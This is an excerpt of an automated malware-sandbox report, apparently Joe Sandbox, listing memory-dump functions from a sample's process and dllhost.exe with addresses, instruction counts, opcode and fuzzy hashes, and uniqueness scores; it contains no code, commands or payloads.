Opcode Fuzzy Hash: 812da23c34ffa5d15c614ecaefafe6262f5a7f4d7819b84c70bda1eb76e03362
Instruction Fuzzy Hash: 05F0E930A1E64D8AEB74FBA484642F97BE0EF15B04F414075E49DC30E1DD745694C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC19A5 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1784003258.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9bac0000_ZyNSmFTtlPIEeiJBfofO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5458cedc32997199291d046f685142034e06c5864efc8f7ac3747100193606c
Instruction ID: 3fe1f1addcff1f2634da837d0fb9535c7f4ea82a5889ca5f12d38946f0b9193c
Opcode Fuzzy Hash: e5458cedc32997199291d046f685142034e06c5864efc8f7ac3747100193606c
Instruction Fuzzy Hash: 9DF09630A0A24D8FDB60EFA8C8656FD7BE0FF14304F00017AE858C3191DAB452508740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC0C36 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1784003258.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9bac0000_ZyNSmFTtlPIEeiJBfofO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 039ec7402a692566396ef587d570993229498bf65e5821f4dcb04440d311637f
Instruction ID: 8a6aaaeb8b6f7eaa24be7602994ac94cdc515cb11f5d3eb35b04e034820921eb
Opcode Fuzzy Hash: 039ec7402a692566396ef587d570993229498bf65e5821f4dcb04440d311637f
Instruction Fuzzy Hash: 28E0ED34F4F40F8AE730BB9488A45BE7264DF51B15F125A32D41A832A6DDBC66458B88

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC0C04 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1784003258.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9bac0000_ZyNSmFTtlPIEeiJBfofO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b22a659e8fdb1ec984cd683ac48b0c7d07b86e54f74f3e0289ca4d7d8cf64b3
Instruction ID: 55611353726e282084abffffed2763e3f7b3575f4f5ca5baaaf5e2edd1cf9d01
Opcode Fuzzy Hash: 9b22a659e8fdb1ec984cd683ac48b0c7d07b86e54f74f3e0289ca4d7d8cf64b3
Instruction Fuzzy Hash: A0E04F30E4F40F8AE730BB94C8545BEB370EB50711F018632C415832A6DEBC66418B88

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC114D Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1784003258.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9bac0000_ZyNSmFTtlPIEeiJBfofO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1885b09f3ddbba1a846fccf970714f50e907a024b9cb59dbf7fde6ff23ee9c1
Instruction ID: cef7215fe3ea885d748291253cb3d062f27736373ba0dc6f746eca212232f630
Opcode Fuzzy Hash: d1885b09f3ddbba1a846fccf970714f50e907a024b9cb59dbf7fde6ff23ee9c1
Instruction Fuzzy Hash: 46E0B634B0551ECFDB24EF80C8A49BE73B1FB94350F010A3AD416D72A1DBB86A048A80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC0BF5 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1784003258.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9bac0000_ZyNSmFTtlPIEeiJBfofO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c5c3147754399c57c45c254844fbbac12ef5a865cf069ce063cba924b10a3ad
Instruction ID: 7369b089ff977fb2459a641f65eb5a7391f3518e4b7792e8eee46f15423a5946
Opcode Fuzzy Hash: 8c5c3147754399c57c45c254844fbbac12ef5a865cf069ce063cba924b10a3ad
Instruction Fuzzy Hash: 1AE01230E4A40ECBEB30EB84C8546BF73B0EB50711F018226C41687295DA7CA645CF84

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC141A Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1784003258.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd9bac0000_ZyNSmFTtlPIEeiJBfofO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad37bf6b808ff4fe1bdff3e552c5bb7618f79455602f5df844fb6b1a2a790628
Instruction ID: 4fbe2ad67e2fb4a2951e37240eacc7229da14ff85c77b83594f119609391547b
Opcode Fuzzy Hash: ad37bf6b808ff4fe1bdff3e552c5bb7618f79455602f5df844fb6b1a2a790628
Instruction Fuzzy Hash: 12D09E74A1562D9EDBA0EFA4C45876976F0AF15704F1101A6D40CD3151DBB816844B42

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: dllhost.exePID: 5516, Parent PID: 2580COMMON

Executed Functions

Function 00007FFD9BAE3704 Relevance: 4.4, Strings: 3, Instructions: 635COMMON

Download Yara Rule

Strings

", xrefs: 00007FFD9BAE4254
", xrefs: 00007FFD9BAE3944
!, xrefs: 00007FFD9BAE33C7

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BADB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9badb000_dllhost.jbxd

Similarity

API ID:
String ID: !$"$"
API String ID: 0-177404684
Opcode ID: 4aa622e62570555e068b7ec7ecd9211a0ce690336ce3e5578d6bffd469ee984a
Instruction ID: a452990277f661c3b4c1e2c2cbd264512a6c37f822e6faf97cba5591e01c2d00
Opcode Fuzzy Hash: 4aa622e62570555e068b7ec7ecd9211a0ce690336ce3e5578d6bffd469ee984a
Instruction Fuzzy Hash: EF42A570E1951D8FDBA9EB58C8A5BA9B7B1FF58304F5041E9D00DE72A1CB74AA81CF04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BADB964 Relevance: 2.6, Strings: 2, Instructions: 103COMMON

Download Yara Rule

Strings

H, xrefs: 00007FFD9BADBAA1
B, xrefs: 00007FFD9BADBAAB

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BADB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9badb000_dllhost.jbxd

Similarity

API ID:
String ID: B$H
API String ID: 0-95463608
Opcode ID: b2c113876bcc9a760b73cf8ff0e59a61fce7b8bcd8dae295b54d058e9f67cf0d
Instruction ID: 15e8812fd52c1275f9857fe301f58960747be9769e993749b813bc66373ff5c5
Opcode Fuzzy Hash: b2c113876bcc9a760b73cf8ff0e59a61fce7b8bcd8dae295b54d058e9f67cf0d
Instruction Fuzzy Hash: 0C413C70A15E5D8FDBA8DB188CA57A9B3B1FF98302F5002F9900DE3291DE746A818F40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BADD339 Relevance: 2.6, Strings: 2, Instructions: 53COMMON

Download Yara Rule

Strings

%, xrefs: 00007FFD9BADCE01
/, xrefs: 00007FFD9BADCF1E

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BADB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9badb000_dllhost.jbxd

Similarity

API ID:
String ID: %$/
API String ID: 0-2617147878
Opcode ID: 2816b2d68e49428bf8c9b3a6fbd45b7c2842bbedba96b6b3b10bdf1dfc97dc60
Instruction ID: c6bd50985ea77279ad6f43dfb2b2a594f339cac1854b09786e0750941329b4e9
Opcode Fuzzy Hash: 2816b2d68e49428bf8c9b3a6fbd45b7c2842bbedba96b6b3b10bdf1dfc97dc60
Instruction Fuzzy Hash: 46113D70E0960E8FEB74DF94C8A8BEDBBB1EB98314F51027DD01997291DAB85984CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BADCD9C Relevance: 2.5, Strings: 2, Instructions: 48COMMON

Download Yara Rule

Strings

%, xrefs: 00007FFD9BADCE01
/, xrefs: 00007FFD9BADCF1E

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BADB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9badb000_dllhost.jbxd

Similarity

API ID:
String ID: %$/
API String ID: 0-2617147878
Opcode ID: 1c88cc88f059ca114ff202699cefd4d43c13162e7cc49c749ed0f5f15c26adc4
Instruction ID: 61b297234c035aab4606392757b20735e5b6560379451a168931545392665fc3
Opcode Fuzzy Hash: 1c88cc88f059ca114ff202699cefd4d43c13162e7cc49c749ed0f5f15c26adc4
Instruction Fuzzy Hash: 03113C70E0860E8FEB64DF94C8A4AED77B1FB98314F51027ED01997291DA785984CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAE9998 Relevance: 1.4, Strings: 1, Instructions: 155COMMON

Download Yara Rule

Strings

, xrefs: 00007FFD9BAE9A12

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BADB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9badb000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: c027f620974161b77dd794f2aa9ed57b60852b1622a9937c2daf432db77e7cd2
Instruction ID: c07b0f0c3b4c2dbda75b0dfe2aeae0738204d1d8f612f1c76ae285343d2e96a9
Opcode Fuzzy Hash: c027f620974161b77dd794f2aa9ed57b60852b1622a9937c2daf432db77e7cd2
Instruction Fuzzy Hash: F9515C31E0964E9FDB69DB99C4A45FDB7B1FF59300F1141BED01AE72A2CA742A01CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD84FA Relevance: 1.3, Strings: 1, Instructions: 57COMMON

Download Yara Rule

Strings

K_^, xrefs: 00007FFD9BAD84FA

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BAD8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9bad8000_dllhost.jbxd

Similarity

API ID:
String ID: K_^
API String ID: 0-847152731
Opcode ID: fdd69cf0e86bf60f0b65b31f05bdb9bd8d048e6fa6394d64cd7c12fa45a36ec9
Instruction ID: 33588f99f1c7f3cec9bb2c5c3c7477092016dcc4cf6a3e5d1e586b78e341ff27
Opcode Fuzzy Hash: fdd69cf0e86bf60f0b65b31f05bdb9bd8d048e6fa6394d64cd7c12fa45a36ec9
Instruction Fuzzy Hash: 0001B5B2E0F6CE4FEB51AF6898541D87FA0FF55210F0601BBE468C71A2EA745645C701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAE7580 Relevance: .7, Instructions: 683COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BADB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9badb000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e1bb0f7f823bff44d8bf3724abcfb63df1a89dee8711fcb869b1d9606a8bf45
Instruction ID: eccf1e0c74dceabe7f773b0bc3dc2cb6f4197dc8a9e17b8286290d65688e7a03
Opcode Fuzzy Hash: 5e1bb0f7f823bff44d8bf3724abcfb63df1a89dee8711fcb869b1d9606a8bf45
Instruction Fuzzy Hash: 3C32B630B19A1D8FDBA8DB58C869A7977E2FF54310F5101B9D00EC72A2DE64ED41CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAED1A0 Relevance: .5, Instructions: 520COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BADB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9badb000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97541881080f8ef17122945bdb39e755ed6f1cb93fd9e3a4bf4849d18d3ba232
Instruction ID: 0d67f0992c83db3fdeaa9dc61d7b4cca274e455c69efd5ac7c302b57b3ebf5bf
Opcode Fuzzy Hash: 97541881080f8ef17122945bdb39e755ed6f1cb93fd9e3a4bf4849d18d3ba232
Instruction Fuzzy Hash: A8228370E1591D8FDBA4EB58C8A9BA8B7B1EF58311F5041E9940DE32A6CE746E81CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAE9C0F Relevance: .4, Instructions: 366COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BADB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9badb000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06ecba400706613fdd518799bc56927b2121cd308a7ae7a966d5565b4884ce05
Instruction ID: 27127bd14ba1c2a04486b0f9054ebeb0571128941873159a3f1866db6485b65c
Opcode Fuzzy Hash: 06ecba400706613fdd518799bc56927b2121cd308a7ae7a966d5565b4884ce05
Instruction Fuzzy Hash: 59D1C03061965A8FEB68CF48C0E45B437A1FF49310B5546BDC84B8F69BCA78F981CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAE9C2F Relevance: .3, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BADB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9badb000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da12cb77e111b66ebf0605f2090ae929027e4d9104cf625985b6bd6dcc5fc2cb
Instruction ID: 2e74dc661acb61f7bc80dae7747c05ddf47accd96e64e94e5ccce4de6938b3d4
Opcode Fuzzy Hash: da12cb77e111b66ebf0605f2090ae929027e4d9104cf625985b6bd6dcc5fc2cb
Instruction Fuzzy Hash: 38C1D03061A64A8FEB2DCF48C0E45B937A1FF45310B5545BDC84B8B69BCA78F985CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD94C1 Relevance: .3, Instructions: 313COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BAD8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9bad8000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8931a4737cb5811f2176cbf2207eae660f4033d52f27cf93ae66871229aadbc
Instruction ID: 4be30b6daabb598b147fa4f36319df374eb9690a36f150630d9932933eba8c7d
Opcode Fuzzy Hash: e8931a4737cb5811f2176cbf2207eae660f4033d52f27cf93ae66871229aadbc
Instruction Fuzzy Hash: 48B13A71E1965D8FDBA8DF98C8A9BACB7B1FF58300F5441BDD009D72A2CA74A941CB01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAE5C3F Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BADB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9badb000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b3f5c9c5533c97c53dbc1aeb3b97bb003d680eb6519d2a0918370ceb5d3f05
Instruction ID: d462a23be2e81fcaa82b08412d8034a05a0804d8313f5f791604a333ef8bfa63
Opcode Fuzzy Hash: 67b3f5c9c5533c97c53dbc1aeb3b97bb003d680eb6519d2a0918370ceb5d3f05
Instruction Fuzzy Hash: 28014706B0E2CA4BD771B3B82C310E87F109F9122AF0901FBE15D8A0E3EC685508C391

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAE8A06 Relevance: .3, Instructions: 251COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BADB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9badb000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f749c639d5dfd4906b420485d33d9130ac4b6877d01753f8497a632ad005b6a4
Instruction ID: 0504b21dcd4615e614525fc91fb54321460d9c99f3b2be1b05e6463c503a35c8
Opcode Fuzzy Hash: f749c639d5dfd4906b420485d33d9130ac4b6877d01753f8497a632ad005b6a4
Instruction Fuzzy Hash: F1713B31B0EA4A4FE3399B58A46507977E0EF45370B16067ED08FC71E2DE6C79428751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAE58E1 Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BADB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9badb000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa18fc8d4cd4fc769d243d7f284ee942b12a214b8be6ebc117f525a8ff9d6b37
Instruction ID: ae937dc5c10d524d56ee78803a86efe60ed615d6df0ed3bc43dedb0531b6be0e
Opcode Fuzzy Hash: fa18fc8d4cd4fc769d243d7f284ee942b12a214b8be6ebc117f525a8ff9d6b37
Instruction Fuzzy Hash: C3711434B0D94E8FDBB8DB48ECA55B833D1FF48321B160276D45EC76B1DA68A9068780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAEAC51 Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BADB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9badb000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92d82418c5ef2304f93f78da32042468312d6863e570c1d8488fc493423811ae
Instruction ID: 714fe79a2b229b89b7414fe585bd83c97ad9cd6d56816fbfa0fd7effe66191a3
Opcode Fuzzy Hash: 92d82418c5ef2304f93f78da32042468312d6863e570c1d8488fc493423811ae
Instruction Fuzzy Hash: CB81B130A0AB0E8FE379DB54C1A457577E1FF44300B12497EC08BC7AA2DAB9B942CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAEBB6A Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BADB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9badb000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac84bd8a46f3c70dddb7f38c9a93c4c486097bd8b21eeb8b52fffe608bd3df0c
Instruction ID: 1e6df2c5207b74167cabc81ff61e3202a1c3919a5acbb536df5c3c93bfe548e9
Opcode Fuzzy Hash: ac84bd8a46f3c70dddb7f38c9a93c4c486097bd8b21eeb8b52fffe608bd3df0c
Instruction Fuzzy Hash: 9481B770E1965D8EDBA4EFA8C865BADB7B1FF58300F5005BAD00DE3295DB746A808B41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAE9FA0 Relevance: .2, Instructions: 216COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BADB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9badb000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db6ffb876cb9c03c14bb3c7bfc72ec50573f25e821f3e9610c934575a1d5b231
Instruction ID: 419590aada21d1ede1f9113f70a051638b20f8f55e751870353cb01908ad4a77
Opcode Fuzzy Hash: db6ffb876cb9c03c14bb3c7bfc72ec50573f25e821f3e9610c934575a1d5b231
Instruction Fuzzy Hash: 5871B430E0D64D4FEBA9DB648865BA87BA0EF59300F0441FEE05ED72E2DE746A44CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAE3C13 Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BADB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9badb000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac20a26a2afa1069c983ecb3f247a516c0008dc39ae58883e25c6613d7c9b83c
Instruction ID: f4b4ff24ff6ac4ef092cabb6dd327574ab787e0662cee95ad9724f13765c47df
Opcode Fuzzy Hash: ac20a26a2afa1069c983ecb3f247a516c0008dc39ae58883e25c6613d7c9b83c
Instruction Fuzzy Hash: 0C716770A1951D8FDBA9EF58C8A9BA9B7B1FF59301F1141E9D00DE7261CA70AE81CF04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BADD9C5 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BADB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9badb000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c1431cc99e2a310aaf40ad779e196997504574e89a27f8e097ff91a04e305df
Instruction ID: b13fc54bad06337144c786e7eb6aa8bc4dae8250889ce502792c802bcaafe91c
Opcode Fuzzy Hash: 4c1431cc99e2a310aaf40ad779e196997504574e89a27f8e097ff91a04e305df
Instruction Fuzzy Hash: 85611C70E0965D8FDBA4EFA8C865AADB7B1FF98300F100579E04DE7296CB7469818B41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAEC989 Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BADB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9badb000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 074b1c29e9f588974e7594069945e6ed6ba791df1d40958212c207f17c150ab4
Instruction ID: d75ca7cec5910e65fdd70b4ead695c9f8a0bcee9b41d9b957b72a640b7c0a0a9
Opcode Fuzzy Hash: 074b1c29e9f588974e7594069945e6ed6ba791df1d40958212c207f17c150ab4
Instruction Fuzzy Hash: 3F51E870E0961D8FEB64EFA8D8A57EDB7B1FF58301F10017AE409A7292DE786941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAE03AD Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BADB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9badb000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ebef80fff14ae4d15a320fe31c39894584c584602d894cc865fb4316fe8ef9e
Instruction ID: 0f5db516d27ceabad7fa19d9b17cdeb0a622037912ca63a5cb8a608fab72e172
Opcode Fuzzy Hash: 8ebef80fff14ae4d15a320fe31c39894584c584602d894cc865fb4316fe8ef9e
Instruction Fuzzy Hash: EB319C70E0A64D8FDBA5EFA8D8616FDBBB0EF55300F15007AE00DE32A2CA7459448B51

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD96AD Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BAD8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9bad8000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a3d0740eb7a910bc0fb1e0f4be1ddcab490969c95615de1b42b9cd8547864e1
Instruction ID: 9410019c170d44492d65b7ff3f24cbedfb837e4c68b0acfdf7aaa90125bfd5b2
Opcode Fuzzy Hash: 3a3d0740eb7a910bc0fb1e0f4be1ddcab490969c95615de1b42b9cd8547864e1
Instruction Fuzzy Hash: A351B870E19A5D8FDF98EF98C8A5BACB7B2FF58304F5441A9D00DDB295CA35A841CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BADD780 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BADB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9badb000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a97f54a56e906e624877c8b7fdf0b7514e0891d0e7e9a25213806d688ff41a5
Instruction ID: fa10979d7b786e86a273f73f694ab6b69592ba38ad4c7504a6a4b33488fed5a6
Opcode Fuzzy Hash: 6a97f54a56e906e624877c8b7fdf0b7514e0891d0e7e9a25213806d688ff41a5
Instruction Fuzzy Hash: 6151566184E3C58FD7038BB888759953FB0AF17214B0A49EBD4C4CF4E3D2286A5AD762

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BADE110 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BADB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9badb000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 289a30cf4e058528d20b0b9cd55bba5f0a17f1196dbe51ffd9a5eefb91ec19da
Instruction ID: d6c346b485db69160e3ff046e1e7f941c6fad52c3c291106b61b30adc04dad04
Opcode Fuzzy Hash: 289a30cf4e058528d20b0b9cd55bba5f0a17f1196dbe51ffd9a5eefb91ec19da
Instruction Fuzzy Hash: 7441B730E1964D8FDB55EBA4D8616EDBBB0FF59310F0502B6E008EB2E6CE786941CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAE8820 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BADB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9badb000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f672f020697b69b733db828a39d079b428be70167aa84b0e7d97ebe7c651b53
Instruction ID: a7e8960164c3bc1b6dcf6d86c1593e5060408fa03c82578a4fe8e6765ab7eabd
Opcode Fuzzy Hash: 2f672f020697b69b733db828a39d079b428be70167aa84b0e7d97ebe7c651b53
Instruction Fuzzy Hash: 46413A70E0961D8EEB64EF98D8657EDBBB1EF58710F11013AD409E3291CB786A40CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAEB277 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1856740870.00007FFD9BADB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9badb000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97ddf722602a0bb3445a35289ca7fde61a9b7a7fef07cfbe730db1edab1c01a9
Instruction ID: 9a84e168cc10f7682f2ba2259dc7eb00c0c3aa8c698b78fc11523b40c124eba4
Opcode Fuzzy Hash: 97ddf722602a0bb3445a35289ca7fde61a9b7a7fef07cfbe730db1edab1c01a9
Instruction Fuzzy Hash: 5941443160D9498FDF58EB58C4A5DA573E1FF68320B0406AAD05FC76A2DE21F945CF81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAD1519 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

